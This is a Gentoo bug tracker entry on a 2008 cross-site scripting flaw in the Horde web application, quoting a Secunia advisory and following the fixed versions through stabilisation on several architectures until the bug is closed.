Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!

Bug 228507

Summary: www-apps/horde < 3.1.8 <3.2.1 script insertion
Product: Gentoo Security Reporter: Matthias Geerdsen (RETIRED) <vorlon>
Component: VulnerabilitiesAssignee: Gentoo Security <security>
Status: RESOLVED FIXED    
Severity: minor CC: rbu, web-apps
Priority: High    
Version: unspecified   
Hardware: All   
OS: Linux   
URL: http://secunia.com/advisories/30697/
Whiteboard: B4 [noglsa]
Package list:
Runtime testing required: ---

Description Matthias Geerdsen (RETIRED) gentoo-dev 2008-06-20 11:25:52 UTC 
secunia:

1) Input passed to item names is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which will be executed in a user's browser session in context of an affected site when the malicious data is viewed.

Successful exploitation requires valid user credentials.

The vulnerability is reported in Horde versions prior to 3.1.8 and 3.2.1, Horde Groupware versions prior to 1.1.1, and Horde Groupware Webmail Edition versions prior to 1.1.1.
Comment 1 Matthias Geerdsen (RETIRED) gentoo-dev 2008-06-20 12:00:02 UTC 
security relevant changes for 3.1.8
http://cvs.horde.org/diff.php/horde/docs/CHANGES?r1=1.515.2.312.2.5&r2=1.515.2.312.2.10&ty=h

[cjh] SECURITY: Escape item names in the object browser (Bug #6906).

security relevant changes for 3.2.1
http://cvs.horde.org/diff.php/horde/docs/CHANGES?r1=1.515.2.392&r2=1.515.2.413&ty=h

[cjh] SECURITY: Escape item names in the object browser (Bug #6906).
Comment 2 Gunnar Wrobel (RETIRED) gentoo-dev 2008-06-24 10:58:04 UTC 
3.1.8 and 3.2.1 are in the tree. 3.2 was unstable on all arches and has been removed.

Target archs for 3.1.8:

  alpha amd64 hppa ppc sparc x86
Comment 3 Christian Faulhammer (RETIRED) gentoo-dev 2008-06-24 21:52:45 UTC 
x86 stable
Comment 4 Raúl Porcel (RETIRED) gentoo-dev 2008-06-26 11:02:17 UTC 
alpha/sparc stable
Comment 5 Tobias Scherbaum (RETIRED) gentoo-dev 2008-06-26 20:37:46 UTC 
ppc stable
Comment 6 Jeroen Roovers (RETIRED) gentoo-dev 2008-06-28 15:26:38 UTC 
Stable for HPPA.
Comment 7 Markus Meier gentoo-dev 2008-07-06 19:20:11 UTC 
amd64 stable, sorry for the delay.
Comment 8 Pierre-Yves Rofes (RETIRED) gentoo-dev 2008-07-06 20:01:25 UTC 
time for glsa decision... XSS => I vote NO.
Comment 9 Tobias Heinlein (RETIRED) gentoo-dev 2008-07-15 10:38:42 UTC 
NO too.
Comment 10 Gunnar Wrobel (RETIRED) gentoo-dev 2008-08-01 04:46:00 UTC 
*** Bug 233334 has been marked as a duplicate of this bug. ***